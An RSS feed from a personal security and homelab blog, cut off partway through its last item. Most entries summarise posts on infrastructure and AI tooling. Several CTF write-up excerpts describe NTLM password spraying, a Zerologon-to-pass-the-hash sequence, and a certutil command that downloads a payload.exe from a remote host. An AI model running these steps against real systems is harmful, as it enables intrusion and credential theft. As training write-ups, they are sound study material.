<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom">
  <channel>
    <title>argv.cloud</title>
    <link>https://8d20253f.argv-cloud-2026.pages.dev/</link>
    <description>Recent content on argv.cloud</description>
    <generator>Hugo</generator>
    <language>en-us</language>
    <lastBuildDate>Fri, 20 Mar 2026 00:00:00 +0000</lastBuildDate>
    <atom:link href="https://8d20253f.argv-cloud-2026.pages.dev/index.xml" rel="self" type="application/rss+xml" />
    <item>
      <title>Did I actually build this website?</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2026/argv-cloud-overhaul-2026/</link>
      <pubDate>Fri, 20 Mar 2026 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2026/argv-cloud-overhaul-2026/</guid>
      <description>How (And why) I overhauled my website, and thoughts on using AI to accomplish it.</description>
    </item>
    <item>
      <title>† Black Metal Terminal †</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2026/black-metal-terminal/</link>
      <pubDate>Thu, 12 Mar 2026 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2026/black-metal-terminal/</guid>
      <description>Setting up a minimalistic black metal theme in MacOS/Linux with Base16 Black Metal themes</description>
    </item>
    <item>
      <title>Understanding Ansible Semaphore by Building a Hardening Audit Pipeline with Lynis, and Prometheus</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/ansible-semaphore-reference/</link>
      <pubDate>Fri, 12 Dec 2025 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/ansible-semaphore-reference/</guid>
      <description>Building an automated Linux hardening audit pipeline using Ansible Semaphore, Lynis, and Prometheus</description>
    </item>
    <item>
      <title>An Agentic Workflow for YARA-L: Automatic Rule Generation with Gemini CLI and Chronicle</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/agentic-yara-l-gen/</link>
      <pubDate>Fri, 05 Dec 2025 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/agentic-yara-l-gen/</guid>
      <description>This is a small framework I put together to generate YARA-L detection rules with an LLM in a self-correcting feedback loop. It aims at automating Detection Engineering for Google SecOps (Chronicle)</description>
    </item>
    <item>
      <title>Architecture overview: Designing a Self-Managing Linux Fleet</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/linux-fleet-arch-overview/</link>
      <pubDate>Sat, 22 Nov 2025 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/linux-fleet-arch-overview/</guid>
      <description>I needed an All-Terrain Linux fleet that could take care of itself: configure, monitor, patch, and protect itself across any environment. This post covers the architecture I designed to make that happen.</description>
    </item>
    <item>
      <title>Agentic Sysadmin. No Playbooks, No YAML</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/ai-remote-ops/</link>
      <pubDate>Fri, 21 Nov 2025 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/ai-remote-ops/</guid>
      <description>This post shows the minimal proof of concept SSH tool I built for Opencode AI, and how it could be used to &amp;ldquo;talk to&amp;rdquo; remote machines.</description>
    </item>
    <item>
      <title>Firewall Inception: My pfSense Lab with Proxmox, Cloudflared, and Tailscale</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/pfsense-lab-inception/</link>
      <pubDate>Mon, 25 Aug 2025 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/pfsense-lab-inception/</guid>
      <description>A simple pfSense ACL project turned into a homelab adventure: Proxmox networking, Cloudflared proxying, and Tailscale inception for remote access.</description>
    </item>
    <item>
      <title>Building a Remote SDR “Observatory” with Proxmox and Tailscale</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/sdr-remote-server/</link>
      <pubDate>Thu, 14 Aug 2025 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/sdr-remote-server/</guid>
      <description>I turned an RTL-SDR dongle in my homelab into a full-time, remote-access RF observatory. This guide covers setting up a Proxmox VM as an SDR server with rtl_tcp, securing it over Tailscale, and streaming signals to GQRX from anywhere in the world.</description>
    </item>
    <item>
      <title>Linux Iptables quick reference</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/iptables-reference/</link>
      <pubDate>Sat, 12 Jul 2025 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/iptables-reference/</guid>
      <description>iptables in 5 Minutes: a quick cheat-sheet for quick rule edits, safe testing, and making changes stick, without tripping over firewalld, UFW, or nftables.</description>
    </item>
    <item>
      <title>Coding with AI: faster than ever, but a bit dumber. MIT explains why</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/ai-assisted-learning-code/</link>
      <pubDate>Fri, 27 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/ai-assisted-learning-code/</guid>
      <description>&lt;p&gt;I used AI to learn Golang in 2025. I was faster than ever, but couldn’t remember what I’d written. A recent MIT study explains why.&lt;/p&gt;</description>
    </item>
    <item>
      <title>MacOS Setup for Efficiency | Part 1: Raycast</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/macos-setup-efficiency/</link>
      <pubDate>Fri, 27 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/macos-setup-efficiency/</guid>
      <description>Intro and Raycast showcase</description>
    </item>
    <item>
      <title>Bash History Expansion and Prompt Magic</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/linux-shell-chops/</link>
      <pubDate>Wed, 25 Jun 2025 21:48:05 -0600</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/linux-shell-chops/</guid>
      <description>&lt;p&gt;Interesting and useful use cases of !, #, and ? expansions in Bash&lt;/p&gt;</description>
    </item>
    <item>
      <title>Booting a private AWS EC2 instance with Tailscale</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/booting-ec2-tailscale/</link>
      <pubDate>Thu, 26 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/booting-ec2-tailscale/</guid>
      <description>Booting up an AWS EC2 Instance with Tailscale baked in for a quick homelab testing environment</description>
    </item>
    <item>
      <title>DoS by playing Janet Jackson: CVE 2022‑38392</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/dos-by-janet-jackson/</link>
      <pubDate>Thu, 26 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/dos-by-janet-jackson/</guid>
      <description>Denial of Service by playing Janet Jackson&amp;rsquo;s &amp;ldquo;Rhythm Nation&amp;rdquo;</description>
    </item>
    <item>
      <title>Debian Linux Post-installation setup</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/debian-linux-setup/</link>
      <pubDate>Thu, 19 Jun 2025 21:40:17 -0600</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/debian-linux-setup/</guid>
      <description>Debian Linux post-installation checklist: Basic installations and configurations for Terminals, Networking, utilities, etc.</description>
    </item>
    <item>
      <title>Who&#39;s monitoring my monitoring Infrastructure? Desigining for observability with Grafana stack</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/monitoring-infra-stack/</link>
      <pubDate>Tue, 10 Jun 2025 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/monitoring-infra-stack/</guid>
      <description>&lt;p&gt;In this post, I go through the design process of setting up a monitoring stack with Grafana and Prometheus, along with a couple of Prometheus custom node exportes, inside a Tailscale network, to monitor a SIEM collection infrastructure stack.&lt;/p&gt;&#xA;&lt;p&gt;Link to Github repository:&lt;/p&gt;&#xA;&lt;p&gt;[]&lt;/p&gt;&#xA;&lt;hr&gt;</description>
    </item>
    <item>
      <title>My Current Workflow</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/my-current-workflow/</link>
      <pubDate>Thu, 29 May 2025 09:44:45 -0600</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/my-current-workflow/</guid>
      <description>&lt;p&gt;My current workflow and overall setup in Linux, MacOS and Windows.&lt;/p&gt;</description>
    </item>
    <item>
      <title>☕️ Cold Brew Recipe</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/cold-brew-recipe/</link>
      <pubDate>Thu, 29 May 2025 04:10:31 -0600</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/cold-brew-recipe/</guid>
      <description>&lt;p&gt;Recipe for a nice cold brew coffee concentrate&lt;/p&gt;</description>
    </item>
    <item>
      <title>Logs as Code: Building Iris</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/iris-1-building/</link>
      <pubDate>Tue, 08 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/iris-1-building/</guid>
      <description>&lt;p&gt;A weekend project turned into Project Iris - A serverless ETL pipeline that bridges the gap between modern vulnerability management and SIEM platforms. This first post dives into the first decisions, challenges, and lessons learned in building a cost-effective, secure, and scalable solution using Google Cloud Platform.&lt;/p&gt;&#xA;&lt;figure class=&#34;w-full mx-auto&#34;&gt;&lt;img src=&#34;https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/iris-1-building/hl-flow.svg&#34;&#xA;    alt=&#34;Iris ETL&#34;&gt;&#xA;&lt;/figure&gt;&#xA;&#xA;&lt;hr&gt;</description>
    </item>
    <item>
      <title>SSH Tunneling and Port-Forwarding guide</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/ssh-tunneling/</link>
      <pubDate>Sun, 06 Apr 2025 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/ssh-tunneling/</guid>
      <description>A brief SSH tunneling &amp;amp; proxy methods guide - Dynamic, Remote &amp;amp; Local port-forwarding. Tunneling and Hardening resources.</description>
    </item>
    <item>
      <title>Red Team Phishing infrastructure &#43; payload setup</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/red-team-infrastructure-setup/</link>
      <pubDate>Sat, 01 Feb 2025 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/red-team-infrastructure-setup/</guid>
      <description>&lt;p&gt;Buildout of an OSPEC prepared Phishing infrastructure as well as FUD decoys and payloads.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Termbot Use Cases</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/termbot-use-cases/</link>
      <pubDate>Thu, 09 Jan 2025 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/termbot-use-cases/</guid>
      <description>Useful ways to leverage Termbot as a Linux CLI LLM tool. From piping/redirecting stdout to reading text from local files, it allows for several combinations of &amp;ldquo;data chaining&amp;rdquo;</description>
    </item>
    <item>
      <title>CSPM Pt 1 Deepfence Threatmapper Installation &amp; Tests</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2024/cspm-deepfence-1/cspmdeepfence-threatmapper-1/</link>
      <pubDate>Sun, 11 Aug 2024 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2024/cspm-deepfence-1/cspmdeepfence-threatmapper-1/</guid>
      <description>&lt;p&gt;I’m installing and testing &lt;a href=&#34;https://deepfence.io&#34;&gt;Deepfence’s&lt;/a&gt; Threatmapper for the first time, an Open Source Cloud Native Application Protection Platform (CNAPP) - To test it against some use cases and understand it a bit better.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Azure Service Principal Automation</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2024/azure-service-principal-automation/</link>
      <pubDate>Sat, 25 May 2024 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2024/azure-service-principal-automation/</guid>
      <description>&lt;p&gt;Quick script to create a Service Principal (Enterprise App) with Global Reader / Viewer on a specified Azure Subscription&lt;/p&gt;</description>
    </item>
    <item>
      <title>About Weaver</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2024/weaver/weaver/</link>
      <pubDate>Tue, 21 May 2024 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2024/weaver/weaver/</guid>
      <description>&lt;p&gt;&lt;img src=&#34;https://github.com/Argandov/Weaver/raw/main/images/banner.png&#34; alt=&#34;&#34;&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://github.com/Argandov/Weaver&#34;&gt;Weaver&lt;/a&gt; is a tool I made for extracting saved acticles from &lt;a href=&#34;https://getpocket.com/&#34;&gt;pocket&lt;/a&gt;, with a specific tag, and summarize them with OpenAI GPT-4. This way I can save blog posts, documentation, etc. And periodically use Weaver to extract summaries of all of them at once.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Termbot</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2024/termbot/</link>
      <pubDate>Fri, 22 Mar 2024 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2024/termbot/</guid>
      <description>&lt;p&gt;Termbot is a command-line interface tool for conveniently interacting with OpenAI&amp;rsquo;s GPT-X or Groq&amp;rsquo;s natural language processing system, directly from your terminal. It allows the user to use standard ChatGPT-like question/answer functionality, with added flexibility such as interacting with local file contents, sending large data from STDIN, using custom local instructions, and more.&lt;/p&gt;</description>
    </item>
    <item>
      <title>SSH Config File - Quick Connection</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2024/ssh-aliases/</link>
      <pubDate>Thu, 15 Feb 2024 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2024/ssh-aliases/</guid>
      <description>&lt;p&gt;Using aliases with SSH for quick &amp;amp; easy connections&lt;/p&gt;</description>
    </item>
    <item>
      <title>PNG to Favicon.ico with ffmpeg</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/favicon-from-png/</link>
      <pubDate>Tue, 13 Feb 2024 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2025/favicon-from-png/</guid>
      <description>Quick how-to: Create favicon.ico from PNG by using FFMPEG</description>
    </item>
    <item>
      <title>Active Directory Houndsquad</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2023/microsoft-active-directory-houndsquad/</link>
      <pubDate>Sun, 15 Oct 2023 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2023/microsoft-active-directory-houndsquad/</guid>
      <description>&lt;p&gt;Exploring the Active Directory Houndsquad: BloodHound/Sharphound, PlumHound, and GoodHound for Red and Blue Team operations.&lt;/p&gt;</description>
    </item>
    <item>
      <title>Setting up TLS in MS Windows RDP</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2023/using-tls-rdp-windows/</link>
      <pubDate>Wed, 15 Feb 2023 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2023/using-tls-rdp-windows/</guid>
      <description>&lt;p&gt;The process of setting up TLS in Microsoft Windows Remote Desktop Services. No certificate verification Server or Revocation lists are taken into account.&lt;/p&gt;</description>
    </item>
    <item>
      <title>A proposed new way of reading books</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2022/proposed-reading-books/proposed-reading-books/</link>
      <pubDate>Mon, 12 Dec 2022 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2022/proposed-reading-books/proposed-reading-books/</guid>
      <description>&lt;p&gt;Of all the reading techniques and tips I&amp;rsquo;ve seen and tried over the years like Speed reading techniques, Feynman Technique, Flash Cards / Notecards, etc. Nothing has actually sticked with me. Here, I proposed a new way, that has helped me develop a deeper comprehension and higher engagement while reading.&lt;/p&gt;</description>
    </item>
    <item>
      <title>CTF Writeup - Breaching AD</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2022/ctf-writeup-breaching-ad/ctf-writeup-breaching-ad/</link>
      <pubDate>Sat, 16 Jul 2022 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2022/ctf-writeup-breaching-ad/ctf-writeup-breaching-ad/</guid>
      <description>&lt;h1 id=&#34;ntlm--netntlm&#34;&gt;NTLM &amp;amp; NetNTLM&lt;/h1&gt;&#xA;&lt;p&gt;Web NetNTLM Server: &lt;a href=&#34;http://ntlmauth.za.tryhackme.com/&#34;&gt;http://ntlmauth.za.tryhackme.com/&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;Untitled.png&#34; alt=&#34;Untitled&#34;&gt;&lt;/p&gt;&#xA;&lt;p&gt;Uses a web-based identification (Challenge-response authentication) to relay the auth mechanism. From the provided script, a &lt;em&gt;&lt;strong&gt;Requests&lt;/strong&gt;&lt;/em&gt; module is imported:&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-python&#34; data-lang=&#34;python&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;kn&#34;&gt;from&lt;/span&gt; &lt;span class=&#34;nn&#34;&gt;requests_ntlm&lt;/span&gt; &lt;span class=&#34;kn&#34;&gt;import&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;HttpNtlmAuth&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With the method (function):&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-python&#34; data-lang=&#34;python&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;n&#34;&gt;requests&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;.&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;get&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;(&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;url&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;,&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;auth&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;=&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;HttpNtlmAuth&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;(&lt;/span&gt;&lt;span class=&#34;bp&#34;&gt;self&lt;/span&gt;&lt;span class=&#34;o&#34;&gt;.&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;fqdn&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;+&lt;/span&gt; &lt;span class=&#34;s2&#34;&gt;&amp;#34;&lt;/span&gt;&lt;span class=&#34;se&#34;&gt;\\&lt;/span&gt;&lt;span class=&#34;s2&#34;&gt;&amp;#34;&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;+&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;user&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;,&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;password&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;))&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id=&#34;password-spraying&#34;&gt;Password Spraying&lt;/h2&gt;&#xA;&lt;p&gt;Using the already built script to authenticate to the web NetNTLM:&lt;/p&gt;&#xA;&lt;p&gt;&lt;img src=&#34;Untitled%201.png&#34; alt=&#34;Untitled&#34;&gt;&lt;/p&gt;&#xA;&lt;h1 id=&#34;ldap-bind-credentials&#34;&gt;LDAP Bind Credentials&lt;/h1&gt;&#xA;&lt;p&gt;Lightweight Authentication protocol → Used by third-parties (Non-MS) to authenticate other services (Jenkins, Git Servers, Web Apps, Printers, VPNs, etc.) to Domains.&lt;/p&gt;</description>
    </item>
    <item>
      <title>CTF Writeup - Zerologon Exploitation</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2022/ctf-writeup-zerologon-exploitation/ctf-writeup-zerologon-exploitation/</link>
      <pubDate>Sat, 18 Jun 2022 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2022/ctf-writeup-zerologon-exploitation/ctf-writeup-zerologon-exploitation/</guid>
      <description>&lt;h1 id=&#34;process-commands--programs&#34;&gt;Process, commands &amp;amp; Programs&lt;/h1&gt;&#xA;&lt;h2 id=&#34;process&#34;&gt;Process&lt;/h2&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;Direct access to Domain Controller&lt;/li&gt;&#xA;&lt;li&gt;Enumeration with nmap (Discovered the IP given is indeed a DC)&lt;/li&gt;&#xA;&lt;li&gt;Applied &lt;a href=&#34;https://github.com/SecuraBV/CVE-2020-1472/blob/master/zerologon_tester.py&#34;&gt;zerologon_tester&lt;/a&gt; to find out if DC is vulnerable&lt;/li&gt;&#xA;&lt;li&gt;Applied &lt;a href=&#34;https://github.com/zeronetworks/zerologon/blob/master/zerologon.py&#34;&gt;zerologon.py&lt;/a&gt; to reset the password to zero values&lt;/li&gt;&#xA;&lt;li&gt;Used impacket’s &lt;code&gt;secretsdump.py&lt;/code&gt; to dump all the hashes (Admin hash), with the parameter “—no-pass”&lt;/li&gt;&#xA;&lt;li&gt;Used &lt;a href=&#34;https://github.com/Hackplayers/evil-winrm&#34;&gt;evil-winrm&lt;/a&gt; to access and pass the hash to the server&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;h2 id=&#34;programs&#34;&gt;Programs&lt;/h2&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;evil-winrm&lt;/li&gt;&#xA;&lt;li&gt;secretsdump (impacket)&lt;/li&gt;&#xA;&lt;li&gt;zerologon (&amp;amp; Source)&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;h1 id=&#34;pocs&#34;&gt;PoCs&lt;/h1&gt;&#xA;&lt;p&gt;&lt;img src=&#34;Untitled.png&#34; alt=&#34;Untitled&#34;&gt;&lt;/p&gt;</description>
    </item>
    <item>
      <title>CTF Writeup - Tech Support</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2022/ctf-writeup-tech-support/ctf-writeup-tech-support/</link>
      <pubDate>Mon, 25 Apr 2022 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2022/ctf-writeup-tech-support/ctf-writeup-tech-support/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;https://tryhackme.com/room/techsupp0rt1&#34;&gt;TryHackMe | Tech_Supp0rt: 1&lt;/a&gt;&lt;/p&gt;&#xA;&lt;!-- more --&gt;&#xA;&lt;p&gt;💡 Enumerate, enumerate, enumerate:&lt;/p&gt;&#xA;&lt;h1 id=&#34;reconnaissance&#34;&gt;Reconnaissance&lt;/h1&gt;&#xA;&lt;p&gt;Ports open:&lt;/p&gt;&#xA;&lt;ul&gt;&#xA;&lt;li&gt;22&lt;/li&gt;&#xA;&lt;li&gt;80&lt;/li&gt;&#xA;&lt;li&gt;139&lt;/li&gt;&#xA;&lt;li&gt;445&#xA;Finding a publicly exposed SMB share with smbmap, and connecting to it via smbclient:&lt;/li&gt;&#xA;&lt;/ul&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-bash&#34; data-lang=&#34;bash&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# Enumeration&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;smbmap -H &amp;lt;ip&amp;gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c1&#34;&gt;# Connection &amp;amp; Retrieval of file/s&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;smbclient &lt;span class=&#34;se&#34;&gt;\\\\&lt;/span&gt;host&lt;span class=&#34;se&#34;&gt;\s&lt;/span&gt;hare&#xA;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Interesting file found with encoded credentials, and using &lt;strong&gt;cyberchef’s magic&lt;/strong&gt; decoding we get the password for a user (We don’t know yet what service credentials is this)&lt;/p&gt;</description>
    </item>
    <item>
      <title>CTF Writeup - Intrusion Detection</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2022/ctf-writeup-intrusion-detection/ctf-writeup-intrusion-detection/</link>
      <pubDate>Wed, 13 Apr 2022 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2022/ctf-writeup-intrusion-detection/ctf-writeup-intrusion-detection/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;https://tryhackme.com/room/idsevasion&#34;&gt;TryHackMe | Intrusion Detection&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;💡 Attacking Grafana &amp;amp; testing Wazuh HIDS &amp;amp; Suricata NIDS&lt;/p&gt;</description>
    </item>
    <item>
      <title>CTF Writeup - LOLBAS</title>
      <link>https://8d20253f.argv-cloud-2026.pages.dev/blog/2022/ctf-writeup-lolbas/ctf-writeup-lolbas/</link>
      <pubDate>Tue, 12 Apr 2022 00:00:00 +0000</pubDate>
      <guid>https://8d20253f.argv-cloud-2026.pages.dev/blog/2022/ctf-writeup-lolbas/ctf-writeup-lolbas/</guid>
      <description>&lt;p&gt;&lt;a href=&#34;https://tryhackme.com/room/livingofftheland&#34;&gt;TryHackMe | Cyber Security Training&lt;/a&gt;&lt;/p&gt;&#xA;&lt;h1 id=&#34;lolbas&#34;&gt;LOLBAS&lt;/h1&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://lolbas-project.github.io/#&#34;&gt;LOLBAS&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;WIndows version of GTFObins&lt;/p&gt;&#xA;&lt;hr&gt;&#xA;&lt;p&gt;#1: Certutil&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil&#34;&gt;certutil&lt;/a&gt;&lt;/p&gt;&#xA;&lt;p&gt;&lt;a href=&#34;https://attack.mitre.org/techniques/T1105/&#34;&gt;https://attack.mitre.org/techniques/T1105/&lt;/a&gt;&lt;/p&gt;&#xA;&lt;div class=&#34;highlight&#34;&gt;&lt;pre tabindex=&#34;0&#34; class=&#34;chroma&#34;&gt;&lt;code class=&#34;language-powershell&#34; data-lang=&#34;powershell&#34;&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c&#34;&gt;# Download from remote:&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;n&#34;&gt;certutil&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;-URLcache&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;-split&lt;/span&gt; &lt;span class=&#34;o&#34;&gt;-f&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;http&lt;/span&gt;&lt;span class=&#34;err&#34;&gt;:&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;//&lt;/span&gt;&lt;span class=&#34;mf&#34;&gt;10.0&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;.&lt;/span&gt;&lt;span class=&#34;py&#34;&gt;0&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;.&lt;/span&gt;&lt;span class=&#34;mf&#34;&gt;13&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;/&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;payload&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;.&lt;/span&gt;&lt;span class=&#34;py&#34;&gt;exe&lt;/span&gt; &lt;span class=&#34;n&#34;&gt;C:&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;\&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;Windows&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;\&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;Temp&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;\&lt;/span&gt;&lt;span class=&#34;n&#34;&gt;payload&lt;/span&gt;&lt;span class=&#34;p&#34;&gt;.&lt;/span&gt;&lt;span class=&#34;py&#34;&gt;exe&lt;/span&gt;&#xA;&lt;/span&gt;&lt;/span&gt;&lt;span class=&#34;line&#34;&gt;&lt;span class=&#34;cl&#34;&gt;&lt;span class=&#34;c&#34;&gt;# Another command for encoding payloads 